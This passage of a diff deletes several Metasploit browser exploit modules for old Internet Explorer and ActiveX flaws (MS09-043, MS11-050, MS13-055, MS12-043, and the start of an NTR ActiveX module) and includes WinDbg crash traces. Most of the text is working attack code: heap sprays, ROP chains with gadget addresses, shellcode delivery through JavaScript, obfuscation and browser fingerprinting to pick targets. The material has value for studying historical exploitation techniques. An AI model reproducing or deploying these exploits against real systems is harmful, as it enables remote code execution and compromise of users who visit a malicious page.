020bc690 633a77ff jscript!VAR::InvokeByName+0x135
020bc6dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
020bc708 633a9c0b jscript!VAR::InvokeByDispID+0xce
020bc8a4 633a5ab0 jscript!CScriptRuntime::Run+0x2989
=end


@ -1,131 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption',
'Description' => %q{
This module exploits a memory corruption vulnerability within versions 10 and 11 of
the Office Web Component Spreadsheet ActiveX control. This module was based on
an exploit found in the wild.
},
'License' => MSF_LICENSE,
'Author' => [ 'unknown', 'hdm', 'Ahmed Obied', 'DSR! <xchwarze[at]gmail.com>' ],
'References' =>
[
[ 'CVE', '2009-1136' ],
[ 'OSVDB', '55806' ],
[ 'MSB', 'MS09-043' ],
[ 'URL', 'http://ahmed.obied.net/software/code/exploits/ie_owc.py' ],
[ 'EDB', '9163' ],
# broken: [ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] # other exploits use 0x0b0c0b0c
],
'DisclosureDate' => 'Jul 13 2009',
'DefaultTarget' => 0))
@javascript_encode_key = rand_text_alpha(rand(10) + 10)
end
def on_request_uri(cli, request)
# Send a redirect with the javascript encoding key
#if (!request.uri.match(/\?\w+/))
# send_local_redirect(cli, "?#{@javascript_encode_key}")
# return
#end
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name}")
shellcode = Rex::Text.to_unescape(p.encoded)
retaddr = Rex::Text.to_unescape([target.ret].pack('V'))
js = %Q|
var xshellcode = unescape("#{shellcode}");
var xarray = new Array();
var xls = 0x81000-(xshellcode.length*2);
var xbigblock = unescape("#{retaddr}");
while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
var xlh = xbigblock.substring(0, xls / 2);
delete xbigblock;
for(xi=0; xi<0x99*2; xi++) {
xarray[xi] = xlh + xlh + xshellcode;
}
CollectGarbage();
var xobj;
try {
xobj = new ActiveXObject("OWC10.Spreadsheet");
} catch(err) {
try {
xobj = new ActiveXObject("OWC11.Spreadsheet");
} catch(err) {
}
}
xe = new Array();
xe.push(1);
xe.push(2);
xe.push(0);
xe.push(window);
for(xi=0; xi < xe.length; xi++){
for(xj=0; xj<10; xj++){
try { xobj.Evaluate(xe[xi]); } catch(e) { }
}
}
window.status = xe[3] + '';
for(xj=0; xj<10; xj++){
try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
}
|
# Obfuscate it up a bit
js = obfuscate_js(js,
'Symbols' => {
'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj err}
}
).to_s
# Encode the javascript payload with the URI key
# js = encrypt_js(js, @javascript_encode_key)
# Fire off the page to the client
send_response(cli, "<html><script language='javascript'>#{js}</script></html>")
# Handle the payload
handler(cli)
end
end


@ -1,284 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :ua_name => HttpClients::IE,
# :ua_minver => "7.0",
# :ua_maxver => "8.0",
# :javascript => true,
# :os_name => OperatingSystems::Match::WINDOWS
#})
def initialize(info={})
super(update_info(info,
'Name' => "MS11-050 IE mshtml!CObjectElement Use After Free",
'Description' => %q{
This module exploits a use-after-free vulnerability in Internet Explorer. The
vulnerability occurs when an invalid <object> tag exists and other elements
overlap/cover where the object tag should be when rendered (due to their
styles/positioning). The mshtml!CObjectElement is then freed from memory because
it is invalid. However, the mshtml!CDisplay object for the page continues to keep
a reference to the freed <object> and attempts to call a function on it, leading
to the use-after-free.
Please note that for IE 8 targets, JRE (Java Runtime Environment) is required
to bypass DEP (Data Execution Prevention).
},
'License' => MSF_LICENSE,
'Author' =>
[
'd0c_s4vage', #Discovery, poc
'sinn3r', #ROP (thx corelanc0d3r), Windows 7
'bannedit' #Windows 7
],
'References' =>
[
['CVE', '2011-1260'],
['OSVDB', '72950'],
['MSB', 'MS11-050'],
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
# In IE6 the mshtml!CObjectElement size is 0xac
[
'Internet Explorer 7 on XP SP3',
{
'Rop' => false,
'Ret' => nil, #Not required for non-ROP targets
'TargetAddr' => 0x0c0c0c0c, #For vtable
'ObjSize' => '0xB0', #mshtml!CObjectElement size
'Offset' => '0x01',
}
],
[
'Internet Explorer 7 on Windows Vista',
{
'Rop' => false,
'Ret' => nil, #Not required for non-ROP targets
'TargetAddr' => 0x0c0c0c0c, #For vtable
'ObjSize' => '0xB0', #mshtml!CObjectElement size
'Offset' => '0x01',
}
],
[
'Internet Explorer 8 on XP SP3',
{
'Rop' => true,
'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
'TargetAddr' => 0x0c0c0c0c, #For vtable
'ObjSize' => '0xE0', #mshtml!CObjectElement size
'Offset' => '0x5E2',
}
],
[
'Internet Explorer 8 on Windows 7',
{
'Rop' => true,
'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
'TargetAddr' => 0x0c0c0c0c, #For vtable
'ObjSize' => '0xE0', #mshtml!CObjectElement size
'Offset' => '0x5F4',
}
],
[ 'Debug Target (Crash)', {} ],
],
'DisclosureDate' => "Jun 16 2011",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
end
def auto_target(cli, request)
agent = request.headers['User-Agent']
if agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
#Windows XP + IE7
mytarget = targets[1]
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
#Windows Vista + IE7
mytarget = targets[2]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
#Windows XP + IE8
mytarget = targets[3]
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
#Windows 7 + IE8
mytarget = targets[4]
else
mytarget = nil
end
return mytarget
end
def on_request_uri(cli, request)
#Set default target
mytarget = target
debug = false
if target.name == 'Automatic'
mytarget = auto_target(cli, request)
if mytarget.nil?
agent = request.headers['User-Agent']
print_error("Unknown User-Agent #{agent}")
send_not_found(cli)
return
end
elsif target.name =~ /Debug/
debug = true
end
if debug
data = <<-DATA
<html>
<body>
<script language='javascript'>
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
document.body.innerHTML += "AAAAAAA";
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
</script>
</body>
</html>
DATA
print_status("Triggering vulnerability (target: #{mytarget.name})...")
send_response(cli, data, { 'Content-Type' => 'text/html' })
return
end
if mytarget['Rop']
p = make_nops(44) #Nops
p << "\xeb\x04\xff\xff" #Jmp over the pivot
p << [mytarget.ret].pack('V') #Stack pivot
p << payload.encoded
rop_payload = generate_rop_payload('java', p)
end
code = (rop_payload) ? rop_payload : payload.encoded
# fill the vtable
vtable = [mytarget['TargetAddr']].pack('V*')
#Convert code format so we can unescape() in JavaScript
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
vtable_js = Rex::Text.to_unescape(vtable, Rex::Arch.endian(target.arch))
randnop = rand_text_alpha(rand(100) + 1)
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
#Extract string based on what the setup is
if mytarget.name == 'Internet Explorer 8 on XP SP3'
js_extract_str = "var block = shellcode.substring(2, 0x20000-0x21);"
elsif mytarget.name == 'Internet Explorer 8 on Windows 7'
js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
else
js_extract_str = "var block = shellcode.substring(0, (0x40000-6)/2);"
end
js = <<-JS
function timedRefresh(timeoutPeriod) {
setTimeout("location.reload(true);",timeoutPeriod);
}
function enable_lfh(heaplib_obj, obj_size, max) {
var vtable = unescape("#{vtable_js}");
while (vtable.length < obj_size) vtable += vtable;
var obj = vtable.substring(0, (obj_size-6)/2);
for (var i=1; i < max; i++) {
heaplib_obj.alloc(obj);
}
}
function heap_spray(heaplib_obj, offset) {
var code = unescape("#{code_js}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x1000) nops += nops;
offset = nops.substring(0, #{mytarget['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
#{js_extract_str}
heaplib_obj.gc();
for (var i2=0; i2 < 0x400-1; i2++) {
heaplib_obj.alloc(block);
}
}
heap = new heapLib.ie(0x20000);
heap_spray(heap, #{mytarget['Offset']});
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
document.body.innerHTML += "<a id='tag_4' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
document.body.innerHTML += "BBBBBBBBBBBBBBBBBBBBBBB";
enable_lfh(heap, #{mytarget['ObjSize']}, 0x500);
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
timedRefresh(2000);
JS
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
html = <<-HTML
<html>
<body>
<script language='javascript'>
#{js}
</script>
</body>
</html>
HTML
print_status("Sending exploit (#{mytarget.name})...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
=begin
(b00.1ac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=0294b920 ecx=0bb300c8 edx=00000000 esi=020be380 edi=00000000
eip=6363fcc6 esp=020be354 ebp=020be36c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
6363fcc6 8b5070 mov edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=????????
=end


@ -1,200 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
'Name' => "MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free",
'Description' => %q{
In IE8 standards mode, it's possible to cause a use-after-free condition by first
creating an illogical table tree, where a CPhraseElement comes after CTableRow,
with the final node being a sub table element. When the CPhraseElement's outer
content is reset by using either outerText or outerHTML through an event handler,
this triggers a free of its child element (in this case, a CAnchorElement, but
some other objects apply too), but a reference is still kept in function
SRunPointer::SpanQualifier. This function will then pass on the invalid reference
to the next functions, eventually used in mshtml!CElement::Doc when it's trying to
make a call to the object's SecurityContext virtual function at offset +0x70, which
results a crash. An attacker can take advantage of this by first creating an
CAnchorElement object, let it free, and then replace the freed memory with another
fake object. Successfully doing so may allow arbitrary code execution under the
context of the user.
This bug is specific to Internet Explorer 8 only. It was originally discovered by
Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again
by Orange Tsai at Hitcon 2013.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jose Antonio Vazquez Gonzalez', # Original discovery reported from iDefense
'Orange Tsai', # Rediscovery, published at Hitcon 2013
'Peter Vreugdenhil', # Joins the party (wtfuzz)
'sinn3r' # Joins the party
],
'References' =>
[
[ 'CVE', '2013-3163' ],
[ 'OSVDB', '94981' ],
[ 'MSB', 'MS13-055' ],
[ 'URL', 'https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[
'IE 8 on Windows XP SP3',
{
'Rop' => :msvcrt,
'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
'Align' => 0x77c4d801 # add esp, 0x2c; ret
}
],
[
'IE 8 on Windows 7',
{
'Rop' => :jre,
'Pivot' => 0x7c348b05, # xchg eax, esp; ret
'Align' => 0x7C3445F8 # add esp, 0x2c; ret
}
]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Privileged' => false,
# Bug was patched in July 2013. Tsai was the first to publish the bug.
# But Jose already reported way back in Oct 2012 (to iDefense)
'DisclosureDate' => "Jul 09 2013",
'DefaultTarget' => 0))
end
def get_target(agent)
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}"
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.1'
os_name = 'Windows 7'
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
return t
end
end
nil
end
def get_payload(t)
if t['Rop'] == :msvcrt
print_status("Using msvcrt ROP")
esp_align = "\x81\xc4\x54\xf2\xff\xff"
rop_dll = 'msvcrt'
opts = {'target'=>'xp'}
else
print_status("Using JRE ROP")
esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
rop_dll = 'java'
opts = {}
end
p = esp_align + payload.encoded + rand_text_alpha(12000)
generate_rop_payload(rop_dll, p, opts)
end
def get_html(t, p)
junk = rand_text_alpha(4).unpack("V")[0].to_i
js_pivot = Rex::Text.to_unescape([t['Pivot']].pack("V*"))
js_payload = Rex::Text.to_unescape(p)
js_align = Rex::Text.to_unescape([t['Align']].pack("V*"))
js_junk = Rex::Text.to_unescape([junk].pack("V*"))
q_id = Rex::Text.rand_text_alpha(1)
%Q|
<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>
</head>
<script>
#{js_mstime_malloc}
window.onload = function() {
var x = document.getElementById("#{q_id}");
x.outerText = "";
a = document.getElementById('myanim');
p = '';
for (i=0; i < 7; i++) {
p += unescape("#{js_junk}");
}
p += unescape("#{js_payload}");
fo = unescape("#{js_align}");
for (i=0; i < 28; i++) {
if (i == 27) { fo += unescape("#{js_pivot}"); }
else { fo += unescape("#{js_align}"); }
}
fo += p;
mstime_malloc({shellcode:fo, heapBlockSize:0x68, objId:"myanim"});
}
</script>
<table>
<tr>
<div>
<span>
<q id='#{q_id}'>
<a>
<td></td>
</a>
</q>
</span>
</div>
</tr>
</table>
<t:ANIMATECOLOR id="myanim"/>
</html>
|
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
t = get_target(agent)
if t
p = get_payload(t)
html = get_html(t, p)
print_status("Sending exploit...")
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
else
print_error("Not a suitable target: #{agent}")
send_not_found(cli)
end
end
end


@ -1,427 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "9.0",
:javascript => true,
:os_name => OperatingSystems::Match::WINDOWS,
:classid => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}",
:method => "definition",
:rank => GoodRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption",
'Description' => %q{
This module exploits a memory corruption flaw in Microsoft XML Core Services
when trying to access an uninitialized Node with the getDefinition API, which
may corrupt memory allowing remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'inking26', # Reliable exploitation
'binjo', # Metasploit module
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-1889' ],
[ 'BID', '53934' ],
[ 'OSVDB', '82873'],
[ 'MSB', 'MS12-043'],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],
[ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities' ]
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 1024
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>
[
# msxml3.dll 8.90.1101.0
[ 'Automatic', {} ],
[
'IE 6 on Windows XP SP3',
{
'Offset' => '0x100',
'Rop' => nil,
'RandomHeap' => false
}
],
[
'IE 7 on Windows XP SP3 / Vista SP2',
{
'Offset' => '0x100',
'Rop' => nil,
'RandomHeap' => false
}
],
[
'IE 8 on Windows XP SP3',
{
'Rop' => :msvcrt,
'RandomHeap' => false,
'RopChainOffset' => '0x5f4',
'Offset' => '0x0',
'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll
}
],
[
'IE 8 with Java 6 on Windows XP SP3',
{
'Rop' => :jre,
'RandomHeap' => false,
'RopChainOffset' => '0x5f4',
'Offset' => '0x0',
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
}
],
[
'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',
{
'Rop' => :jre,
'RandomHeap' => false,
'RopChainOffset' => '0x5f4',
'Offset' => '0x0',
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
}
],
[
'IE 9 with Java 6 on Windows 7 SP1',
{
'Rop' => :jre,
'RandomHeap' => true,
'RopChainOffset' => 0x5FC,
'Offset' => '0x0',
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
}
]
],
'Privileged' => false,
'DisclosureDate' => "Jun 12 2012",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1] #IE 6 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows XP SP3
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows Vista SP2
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[3] #IE 8 on Windows XP SP3
elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/
return targets[5] #IE 8 on Windows 7 SP1/Vista SP2
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
return targets[6] #IE 9 on Windows 7 SP1
else
return nil
end
end
def ret(t)
case t['Rop']
when :msvcrt
return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
when :jre
return [ 0x7c347f98 ].pack("V") # RETN (ROP NOP) # msvcr71.dll
end
end
def popret(t)
case t['Rop']
when :msvcrt
return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
when :jre
return [ 0x7c376541 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcr71.dll
end
end
def get_rop_chain(t)
if t['RandomHeap']
adjust = [ 0x0c0c0c0c ].pack("V") # heap isn't filled with pointers to 0x0c0c0c0c
adjust << ret(t)
else
adjust = ret(t)
end
adjust << popret(t)
adjust << [ t['StackPivot'] ].pack("V")
adjust << ret(t) * 4 # first call to a "ret" because there is a good gadget in the stack :)
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
else
print_status("Using JRE ROP")
rop = generate_rop_payload('java','',{'pivot'=>adjust})
end
return rop
end
def get_easy_spray(t, js_code, js_nops)
randnop = rand_text_alpha(rand(100) + 1)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x230; z++) {
heap_obj.alloc(block);
}
JS
return spray
end
def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)
randnop = rand_text_alpha(rand(100) + 1)
randnop2 = rand_text_alpha(rand(100) + 1)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
var #{randnop2} = "#{js_90_nops}";
var nops_90 = unescape(#{randnop2});
var rop_chain = unescape("#{js_rop}");
while (nops.length < 0x80000) nops += nops;
while (nops_90.length < 0x80000) nops_90 += nops_90;
var offset = nops.substring(0, #{t['Offset']});
var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length);
var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x230; z++) {
heap_obj.alloc(block);
}
JS
return spray
end
# Spray published by corelanc0d3r
# Exploit writing tutorial part 11 : Heap Spraying Demystified
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
def get_random_spray(t, js_rop, js_code, js_90_nops)
spray = <<-JS
function randomblock(blocksize)
{
var theblock = "";
for (var i = 0; i < blocksize; i++)
{
theblock += Math.floor(Math.random()*90)+10;
}
return theblock;
}
function tounescape(block)
{
var blocklen = block.length;
var unescapestr = "";
for (var i = 0; i < blocklen-1; i=i+4)
{
unescapestr += "%u" + block.substring(i,i+4);
}
return unescapestr;
}
var heap_obj = new heapLib.ie(0x10000);
var rop = unescape("#{js_rop}");
var code = unescape("#{js_code}");
var #{randnop2} = "#{js_90_nops}";
var nops_90 = unescape(#{randnop2});
while (nops_90.length < 0x80000) nops_90 += nops_90;
var offset_length = #{t['RopChainOffset']};
for (var i=0; i < 0x1000; i++) {
var padding = unescape(tounescape(randomblock(0x1000)));
while (padding.length < 0x1000) padding+= padding;
var junk_offset = padding.substring(0, offset_length - code.length);
var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length);
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
heap_obj.alloc(sprayblock);
}
JS
return spray
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
send_not_found(cli)
return
end
p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
if not my_target['Rop'].nil?
js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
end
if my_target['RandomHeap']
js = get_random_spray(my_target, js_rop, js_code, js_90_nops)
elsif not my_target['Rop'].nil?
js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops)
else
js = get_easy_spray(my_target, js_code, js_nops)
end
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
object_id = rand_text_alpha(4)
html = <<-EOS
<html>
<head>
<script>
#{js}
</script>
</head>
<body>
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="#{object_id}"></object>
<script>
var obj = document.getElementById('#{object_id}').object;
var src = unescape("%u0c08%u0c0c");
while (src.length < 0x1002) src += src;
src = "\\\\\\\\xxx" + src;
src = src.substr(0, 0x1000 - 10);
var pic = document.createElement("img");
pic.src = src;
pic.nameProp;
obj.definition(#{rand(999) + 1});
</script>
</body>
</html>
EOS
html = html.gsub(/^ {4}/, '')
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
=begin
(e34.358): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7498670c ebx=00000000 ecx=5f5ec68b edx=00000001 esi=7498670c edi=0013e350
eip=749bd772 esp=0013e010 ebp=0013e14c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
msxml3!_dispatchImpl::InvokeHelper+0xb4:
749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:5f5ec6a3=????????
0:008> r
eax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528
eip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
msxml3!_dispatchImpl::InvokeHelper+0xb4:
749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=????????
0:008> k
ChildEBP RetAddr
020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4
020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e
020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa
020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50
020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa
020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d
020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98
020bf590 633a77ff jscript!VAR::InvokeByName+0x135
020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce
020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989
020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff
020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f
020bf958 633891f1 jscript!CSession::Execute+0x175
020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0
020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a
020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30
020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219
=end


@ -1,200 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
#include Msf::Exploit::Remote::BrowserAutopwn
#
#autopwn_info({
# :ua_name => HttpClients::IE,
# :ua_minver => "6.0",
# :ua_maxver => "7.0",
# :javascript => true,
# :os_name => OperatingSystems::Match::WINDOWS,
# :classid => "{E6ACF817-0A85-4EBE-9F0A-096C6488CFEA}",
# :method => "StopModule",
# :rank => NormalRanking
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'NTR ActiveX Control StopModule() Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The
vulnerability exists in the StopModule() method, where the lModule parameter is
used to dereference memory to get a function pointer, which leads to code execution
under the context of the user visiting a malicious web page.
},
'Author' =>
[
'Carsten Eiram', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-0267' ],
[ 'OSVDB', '78253' ],
[ 'BID', '51374' ],
[ 'URL', 'http://secunia.com/secunia_research/2012-2/' ]
],
